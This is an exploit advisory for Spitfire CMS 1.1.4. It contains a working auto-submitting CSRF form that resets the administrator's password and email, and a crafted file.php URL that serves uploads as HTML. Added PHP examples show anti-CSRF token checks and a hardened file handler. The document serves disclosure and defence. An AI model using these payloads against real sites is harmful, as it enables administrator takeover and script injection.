###################################################################################################################################
# Exploit Title: Spitfire CMS - CSRF / ADD / EDIT / UPLOAD FILE
# Date: 15 August 2013
# Exploit Author: Yashar Shahinzadeh
# Special thanks to Mormoroth
# Credit goes to: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: http://spitfire.clausmuus.de/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version: 1.1.4
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
###################################################################################################################################
Summary:
========
1. CSRF - Adding/Editing administrator account / UPLOAD FILE
1. CSRF - Adding/Editing administrator account:
===============================================
Spitfire CMS is not a well-coded CMS; it has many errors and poor performance. It has no CSRF protection, so an attacker can add or edit administrator accounts, or even upload a file, through CSRF. I only give an example of changing the administrator's details:
<html>
  <body onload="submitForm()">
    <!-- The form is submitted automatically when the page loads. -->
    <form name="myForm" id="myForm"
          action="http://localhost/spitfire_site/cms/edit/tpl_user_settings_action.php" method="post">
      <input type="hidden" name="value[password]" value="arian123">
      <input type="hidden" name="value[password2]" value="arian123">
      <input type="hidden" name="value[email]" value="y.shahinzadeh@gmail.com">
      <input type="hidden" name="action" value="save">
    </form>
    <script type="text/javascript">
      // Called from the body's onload handler above.
      function submitForm() { document.getElementById('myForm').submit(); }
    </script>
  </body>
</html>
After the form is submitted, a response similar to the following is returned:
status = {'values':{'id':'1','realname':'Administrator','username':'admin','password':'','groups':{'all':'7','1':'4'},'may_edit_users':'1','is_admin':'1','status':'0','is_ldap_user':'0','must_change_password':'','email':'admin@admin.net','language':'en'},'messages':{},'quickbar':{'disabledButtons':{'save':'1','redo':'1'}},'statusbar':{'value':' #1'}};
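The missing control is a per-session anti-CSRF token on the settings form. The following is an added example of how a form handler like tpl_user_settings_action.php could be protected; it is not Spitfire's code and assumes the CMS keeps the admin login in a PHP session and runs on PHP 7 or later (for random_bytes()). The field name csrf_token and the same_origin() helper are my own choices.

```php
<?php
// Added example, not Spitfire's code: synchronizer-token CSRF protection for a
// state-changing form such as tpl_user_settings_action.php.
// Assumes: PHP >= 7 and an existing session-based admin login.
session_start();

// Issue one random token per session and embed it in every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept the POST only if the submitted token matches the session token
// (constant-time comparison so the check itself leaks nothing).
function csrf_check(array $post): bool {
    $sent   = $post['csrf_token'] ?? '';
    $stored = $_SESSION['csrf_token'] ?? '';
    return $stored !== '' && is_string($sent) && hash_equals($stored, $sent);
}

// Defence in depth: a cross-site POST carries the other site's Origin (or
// Referer), so refuse POSTs whose Origin host is not this host.
function same_origin(array $server): bool {
    $host   = strtolower(explode(':', $server['HTTP_HOST'] ?? '')[0]);
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($host === '' || $origin === '') {
        return false;               // no Origin/Referer at all: treat as cross-site
    }
    $originHost = (string) parse_url($origin, PHP_URL_HOST);
    return strtolower($originHost) === $host;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!same_origin($_SERVER) || !csrf_check($_POST)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // Only now is it safe to apply $_POST['value']['password'], ['email'], etc.
    exit('saved');
}

// GET: render the form with the token as a hidden field.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="post" action="tpl_user_settings_action.php">
  <input type="hidden" name="csrf_token" value="{$token}">
  <input type="password" name="value[password]">
  <input type="password" name="value[password2]">
  <input type="email" name="value[email]">
  <input type="hidden" name="action" value="save">
  <button type="submit">Save</button>
</form>
HTML;
```

With this in place the auto-submitting page above fails the csrf_check() step, because the attacker's page cannot read the victim's session token. Setting the session cookie with the SameSite attribute is a further, independent layer.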
I will expand on the upload procedure. When the site is installed, the author is forced to name a writable directory for saving files, and finding that directory is not difficult (the default is /site/files/). The upload form has no CSRF token, so an attacker can upload a malicious file containing HTML/JavaScript code. After upload the file is renamed to a file without any extension, so only client-side exploits and attacks can be conducted. Because file.php reads the stored file back with file_get_contents() and serves it, the attacker must supply a crafted URL similar to the following:
http://localhost/spitfire_site/cms/file.php?cms_id=4&name=logo&type=text/html
The type=text/html parameter is the dangerous part: the default is image/gif, but the caller can override it with any MIME type.
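The fix on the serving side is to never take the Content-Type from the request. The following is an added example of a hardened file.php, not Spitfire's own code; it assumes uploads are stored under a directory such as /site/files/ with a bare, extension-less name (as described above), and the constants FILE_DIR and INLINE_TYPES are my own. The cms_id parameter from the original URL is omitted because the page does not describe what it selects.

```php
<?php
// Added example, not Spitfire's file.php: serve a stored upload without trusting
// a caller-supplied ?type= parameter.
// Assumes: files live in FILE_DIR under a plain name with no extension.
const FILE_DIR = __DIR__ . '/site/files';

// MIME types a browser may render inline; anything else is forced to download.
const INLINE_TYPES = ['image/gif', 'image/png', 'image/jpeg'];

// Accept only a plain file name so ?name= cannot escape FILE_DIR.
function safe_name(string $name): ?string {
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) === 1 ? $name : null;
}

// Derive the response headers from the file's actual bytes, never from the query.
function serve_headers(string $path): array {
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($path) ?: 'application/octet-stream';
    $inline   = in_array($detected, INLINE_TYPES, true);
    return [
        // Non-image content is sent as an opaque download, so stored HTML is
        // never rendered in the site's origin.
        'Content-Type'            => $inline ? $detected : 'application/octet-stream',
        // Stop browsers from sniffing a different type than the one declared.
        'X-Content-Type-Options'  => 'nosniff',
        'Content-Disposition'     => ($inline ? 'inline' : 'attachment') . '; filename="download"',
        // Even if something is rendered, it runs with no script or origin privileges.
        'Content-Security-Policy' => "default-src 'none'; sandbox",
    ];
}

$name = safe_name((string) ($_GET['name'] ?? ''));
if ($name === null) {
    http_response_code(400);
    exit;
}
$path = FILE_DIR . '/' . $name;
if (!is_file($path)) {
    http_response_code(404);
    exit;
}
foreach (serve_headers($path) as $header => $value) {
    header("$header: $value");
}
readfile($path);
```

With this handler the crafted URL above is harmless: the type parameter is ignored, a file whose bytes are HTML is detected as text/html, is not in INLINE_TYPES, and so is returned as application/octet-stream with Content-Disposition: attachment and nosniff. Serving user uploads from a separate origin (a dedicated files domain) removes the remaining risk entirely.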
/** Yashar Shahinzadeh **/
###################################################################################################################################
# Title: Spitfire CMS 1.1.4 - CSRF Vulnerability
# EDB-ID: 27601
# OSVDB: 66409
# Published: 2013-08-15
# Source: https://www.exploit-db.com/exploits/27601/
###################################################################################################################################